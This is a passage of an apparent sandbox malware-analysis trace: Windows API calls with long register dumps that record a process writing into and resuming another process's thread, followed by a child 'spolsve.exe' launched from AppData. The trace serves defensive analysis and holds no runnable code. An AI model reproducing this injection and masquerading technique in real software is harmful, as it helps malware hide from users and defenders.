[29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0115.890] NtSetContextThread (ThreadHandle=0x22c, Context=0x19f6f0*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x0, Ebx=0x27d000, Edx=0x0, Ecx=0x0, Eax=0x404656, Ebp=0x0, Eip=0x77e04210, SegCs=0x23, EFlags=0x202, Esp=0x19fff0, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0115.891] NtWriteVirtualMemory (in: ProcessHandle=0x228, BaseAddress=0x27d008, Buffer=0x19fc74*, NumberOfBytesToWrite=0x4, NumberOfBytesWritten=0x0 | out: Buffer=0x19fc74*, NumberOfBytesWritten=0x0) returned 0x0 [0115.891] NtResumeThread (in: ThreadHandle=0x22c, SuspendCount=0x0 | out: SuspendCount=0x0) returned 0x0 [0115.958] NtClose (Handle=0x22c) returned 0x0 [0115.960] NtClose (Handle=0x228) returned 0x0 [0115.960] NtClose (Handle=0x240) returned 0x0 [0115.960] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19fc20*=0x460000, RegionSize=0x19fbe0, FreeType=0x8000) returned 0x0 [0115.960] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x4b0000) returned 0x0 [0115.960] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x554a38) returned 1 [0115.961] NtTerminateProcess (ProcessHandle=0xffffffff, ExitStatus=0x0) Thread: id = 63 os_tid = 0x918 Process: id = "3" image_name = "spolsve.exe" filename = "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\templates\\spolsve.exe" page_root = "0x1f2a3000" os_pid = "0x4a8" os_integrity_level = "0x2000" os_privileges = "0x40800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xa78" cmd_line = "\"C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\spolsve.exe\"" cur_dir = "C:\\Users\\FD1HVy\\Documents\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:000110fb" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 65 os_tid = 0xa80 [0116.282] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0116.282] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x2160000 [0116.284] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75b20000 [0116.284] GetProcAddress (hModule=0x75b20000, lpProcName="FlsAlloc") returned 0x75b34ae0 [0116.284] GetProcAddress (hModule=0x75b20000, lpProcName="FlsGetValue") returned 0x75b34b20 [0116.284] GetProcAddress (hModule=0x75b20000, lpProcName="FlsSetValue") returned 0x75b34b40 [0116.284] GetProcAddress (hModule=0x75b20000, lpProcName="FlsFree") returned 0x75b34b00 [0116.285] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x8, Size=0x214) returned 0x21605a8 [0116.285] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75b20000 [0116.285] GetCurrentThreadId () returned 0xa80 [0116.285] GetStartupInfoW (in: lpStartupInfo=0x19fef8 | out: lpStartupInfo=0x19fef8*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\spolsve.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x405ff0, hStdOutput=0x406329, hStdError=0x21605a8)) [0116.285] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x8, Size=0x800) returned 0x21607c8 [0116.285] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0116.285] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0116.285] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0116.286] SetHandleCount (uNumber=0x20) returned 0x20 [0116.286] GetCommandLineA () returned="\"C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\spolsve.exe\"" [0116.286] GetEnvironmentStringsW () returned 0x735490* [0116.286] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=::=::\\", cchWideChar=1545, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1545 [0116.286] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x609) returned 0x2160fd0 [0116.286] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=::=::\\", cchWideChar=1545, lpMultiByteStr=0x2160fd0, cbMultiByte=1545, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=::=::\\", lpUsedDefaultChar=0x0) returned 1545 [0116.286] FreeEnvironmentStringsW (penv=0x735490) returned 1 [0116.286] GetLastError () returned 0x0 [0116.286] SetLastError (dwErrCode=0x0) [0116.286] GetLastError () returned 0x0 [0116.286] SetLastError (dwErrCode=0x0) [0116.286] GetLastError () returned 0x0 [0116.286] SetLastError (dwErrCode=0x0) [0116.286] GetACP () returned 0x4e4 [0116.286] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x21615e8 [0116.286] GetLastError () returned 0x0 [0116.286] SetLastError (dwErrCode=0x0) [0116.286] IsValidCodePage (CodePage=0x4e4) returned 1 [0116.286] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x19fec0 | out: lpCPInfo=0x19fec0) returned 1 [0116.286] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x19f98c | out: lpCPInfo=0x19f98c) returned 1 [0116.286] GetLastError () returned 0x0 [0116.286] SetLastError (dwErrCode=0x0) [0116.286] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0116.286] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x19f708, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿퟱퟀ쎍@Ā") returned 256 [0116.287] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿퟱퟀ쎍@Ā", cchSrc=256, lpCharType=0x19f9a0 | out: lpCharType=0x19f9a0) returned 1 [0116.287] GetLastError () returned 0x0 [0116.287] SetLastError (dwErrCode=0x0) [0116.287] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0116.287] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x19f6d8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ솑@Ā") returned 256 [0116.287] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ솑@Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0116.287] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ솑@Ā", cchSrc=256, lpDestStr=0x19f4c8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f 